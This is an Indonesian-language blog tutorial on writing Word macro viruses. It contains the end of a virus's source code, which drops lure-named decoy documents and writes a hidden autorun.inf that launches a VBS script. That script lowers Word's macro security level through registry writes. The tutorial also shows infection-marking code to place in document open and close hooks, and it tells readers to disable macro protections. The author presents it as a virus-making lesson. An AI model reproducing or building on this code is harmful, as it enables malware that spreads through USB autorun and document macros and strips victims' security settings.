<span style="color: #ff0000;">Trik(7) = partisi &amp; :\Cheat game Ayo Dance.doc</span>
1
<span style="color: #ff0000;">Trik(8) = partisi &amp; :\Goosebumps.doc</span>
1
<span style="color: #ff0000;">Trik(9) = partisi &amp; :\FearStreet.doc</span>
1
<span style="color: #ff0000;">Trik(10) = partisi &amp; :\R.L.Stine.doc</span>
1
<span style="color: #ff0000;">If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then</span>
1
<span style="color: #ff0000;">Randomize</span>
1
<span style="color: #ff0000;">rogi = Int(10 * Rnd) + 1</span>
1
<span style="color: #ff0000;">Open Trik(rogi) For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, “”</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">Open atr For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, [Autorun]</span>
1
<span style="color: #ff0000;">Print #1, shell\Open\command=wscript.exe auto.vbs</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">SetAttr atr, vbHidden + vbSystem</span>
1
<span style="color: #ff0000;">Open vbs For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, dim a</span>
1
<span style="color: #ff0000;">Print #1, set a = createobject( &amp; Chr(34) &amp; Wscript.shell &amp; Chr(34) &amp; )</span>
1
<span style="color: #ff0000;">Print #1, a.regwrite &amp; Chr(34) &amp; HKCU\Software\Microsoft\Office\10.0\Word\Security\Level &amp; Chr(34) &amp; , &amp; Chr(34) &amp; 1 &amp; Chr(34) &amp; , &amp; Chr(34) &amp; REG_DWORD &amp; Chr(34)</span>
1
<span style="color: #ff0000;">Print #1, a.regwrite &amp; Chr(34) &amp; HKCU\Software\Microsoft\Office\11.0\Word\Security\Level &amp; Chr(34) &amp; , &amp; Chr(34) &amp; 1 &amp; Chr(34) &amp; , &amp; Chr(34) &amp; REG_DWORD &amp; Chr(34)</span>
1
<span style="color: #ff0000;">Print #1, a.regwrite &amp; Chr(34) &amp; HKCU\Software\Microsoft\Office\12.0\Word\Security\Level &amp; Chr(34) &amp; , &amp; Chr(34) &amp; 1 &amp; Chr(34) &amp; , &amp; Chr(34) &amp; REG_DWORD &amp; Chr(34)</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">SetAttr vbs, vbHidden + vbSystem</span>
1
<span style="color: #ff0000;">Next a</span>
1
<span style="color: #ff0000;">End Sub</span>
Hati –hati dengan source diatas. Karena lumayan bikin pening juga. Tapi maaf ya kalo aku gak bisa jelasinnya sekarang. Karena kalo aku jelasin nanti tutorial ini terlalu panjangggggggggggggggg……. Makanya penjelasan mengenai source di atas aku buat di tutorial kedua.
EFEK-EFEK KECIL DAN TANDA-TANDA TERINFEKSI



Nah coba tebak mana file virus dan mana file yang bukan virus!!!!!!!!
Jawabannya lihat di bawah!!

CARA MEMBUAT VIRUS LANJUTAN
Ini nih, dulu saya udah janji untuk ngelanjutin sample virus macro yang saya buat dulu. Di tutorial kali ini saya akan jelasin sedikit demi sedikit untuk mempelajari virus macro ini…
Pernah dengar virus Macroid? Itu adalah salah satu contoh virus macro yang saya buat.
Langsung aja.
Buka visual Basic editor di Tools>macro>visual basic editor ato tekan pada keyboard Alt+F11
Tampilannya mirip dengan VB6 kita, dan penggunaan sourcenya juga gak jauh beda…
Misalnya :
Dim AD as object
Ya gak. Mirip kan dengan script di VB6? Dan dilanjutkan dengan penggunaan ”set”. Misalnya :
set AD=ActiveDocument.VBProject.VBComponents.Item(1)
ha ha ha… oke deh gak usah main-main. Langsung keserius nya aja…
Script dibawah ini untuk mengubah ”Name” document yang diinfeksi (umumnya ini yang dijadikan sebagai nama virus macro kita)
1
<span style="color: #ff0000;">dim AD as object set AD=ActiveDocument.VBProject.VBComponents.Item(1)</span>
1
<span style="color: #ff0000;">if AD.Name Macroid then AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines AD.Name = Macroid end if</span>
contoh script diatas adalah untuk mengubah name document menjadi ”Macroid”. (efek ini baru bisa dijalankan setelah virus yang utuh dieksekusi)
Script diatas bisa kamu sisipkan di ”Document_Close()” ato di ”Document_Open()” ato di ”Document_New()”
Kalo disisipkan di “Document_Close()” efeknya akan berjalan saat document ditutup. Dan begitu juga dengan “Document_Open()” dan “Document_new()”
Kalo disisipkan di “Document_Open()” efeknya akan berjalan saat document dibuka.
Kalo disisipkan di “Document_new()” efeknya akan aberjalan saat document baru dibuka.
Ini contoh gambarnya…
image002
Efeknya adalah ini.

Itu tandanya virus “Macroid”!!! ha ha ha… oke.
Sebenarnya saya mau menjelaskan lebih banyak soal trik-trik virus macro, tapi saya yakin sebelum sampai diatas pasti masih banyak masalah untuk kalian…
Sebelumnya kalian harus perhatikan security macro kalian.
Lihat Tools>Macro>security
image006
Yang harus kita pilih adalah opsi ”Low” supaya Ms.Word akan menjalankan semua script di visual Basic Editor. Karena kita masih belajar-belajar biarkan saja kita yang atur security ini, nanti kalo kita udah mau bikin virus macro, ada caranya supaya virus kita yang ngatur security ini… tenang aja…
Setelah kita set securitynya, silakan save document terus hidupkan document kita tadi.
Ada satu lagi masalah… kalo nanti ”misalnya” ada gambar seperti dibawah ini:
image010
Berarti ada hal yang harus kita atur dulu… Buka lagi security macro tadi.
Lalu pada tab Trusted Publishers silakan ceklis “Trust aceess to Visual Basic Project”
Nah klo itu dah dilakukan, maka untuk berikut-berikutnya kalo kita mau ngetes virus macro kita udah bisa boss….
Read More >>